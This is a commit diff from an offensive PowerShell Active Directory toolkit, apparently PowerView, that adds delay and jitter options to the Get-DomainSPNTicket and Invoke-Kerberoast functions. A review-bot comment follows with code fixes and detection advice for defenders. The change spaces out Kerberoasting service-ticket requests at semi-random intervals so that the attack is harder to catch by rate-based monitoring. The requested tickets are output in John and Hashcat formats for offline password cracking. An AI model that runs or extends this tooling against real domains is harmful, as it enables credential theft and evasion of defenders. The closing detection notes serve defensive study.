3.0-Beta
xorrior 2018-03-14 14:06:00 -04:00
commit 2e04538d7d
1 changed files with 34 additions and 1 deletions


@ -487,6 +487,14 @@ Defaults to 'John'.
A [Management.Automation.PSCredential] object of alternate credentials A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote domain using Invoke-UserImpersonation. for connection to the remote domain using Invoke-UserImpersonation.
.PARAMETER Delay
Specifies the delay in seconds between ticket requests.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.EXAMPLE .EXAMPLE
Get-DomainSPNTicket -SPN "HTTP/web.testlab.local" Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
@ -543,6 +551,14 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
[String] [String]
$OutputFormat = 'John', $OutputFormat = 'John',
[ValidateRange(0,10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[Management.Automation.PSCredential] [Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()] [Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty $Credential = [Management.Automation.PSCredential]::Empty
@ -563,8 +579,11 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
else { else {
$TargetObject = $SPN $TargetObject = $SPN
} }
$RandNo = New-Object System.Random
ForEach ($Object in $TargetObject) { ForEach ($Object in $TargetObject) {
if ($PSBoundParameters['User']) { if ($PSBoundParameters['User']) {
$UserSPN = $Object.ServicePrincipalName $UserSPN = $Object.ServicePrincipalName
$SamAccountName = $Object.SamAccountName $SamAccountName = $Object.SamAccountName
@ -641,6 +660,8 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
$Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket') $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')
Write-Output $Out Write-Output $Out
} }
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
} }
} }
@ -1029,6 +1050,10 @@ Defaults to 'John'.
.PARAMETER Credential .PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain. for connection to the target domain.
.PARAMETER Delay
Specifies the delay in seconds between ticket requests.
.PARAMETER Jitter
Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
.EXAMPLE .EXAMPLE
Invoke-Kerberoast | fl Invoke-Kerberoast | fl
Kerberoasts all found SPNs for the current domain. Kerberoasts all found SPNs for the current domain.
@ -1089,6 +1114,14 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
[Switch] [Switch]
$Tombstone, $Tombstone,
[ValidateRange(0,10000)]
[Int]
$Delay = 0,
[ValidateRange(0.0, 1.0)]
[Double]
$Jitter = .3,
[ValidateSet('John', 'Hashcat')] [ValidateSet('John', 'Hashcat')]
[Alias('Format')] [Alias('Format')]
[String] [String]
@ -1121,7 +1154,7 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
PROCESS { PROCESS {
if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity } if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity }
Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -Delay $Delay -OutputFormat $OutputFormat -Jitter $Jitter
} }
END { END {
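Review bot: The sleep added at the end of the `ForEach ($Object in $TargetObject)` body in Get-DomainSPNTicket runs unconditionally, so with the default `-Delay 0` every iteration still evaluates `$RandNo.Next(0, 0)` and calls `Start-Sleep -Seconds 0`. Guarding it as `if ($Delay -gt 0) { Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) }` keeps the default path free of the extra calls. The two bounds are Double expressions passed to `System.Random.Next(Int32, Int32)`, so PowerShell converts them to whole seconds and the upper bound is exclusive; neither `.PARAMETER` help block says this, and a line such as `The resulting interval is rounded to whole seconds.` under `.PARAMETER Jitter` would document it. The loop begins and ends outside the visible hunks, so it cannot be confirmed from here whether the sleep is also reached when a ticket request fails. For readers on the monitoring side, the option only spaces requests out: each SPN still results in its own service-ticket request, so detections that count distinct SPNs requested per account over a long window, or that alert on a decoy SPN, do not depend on the request rate.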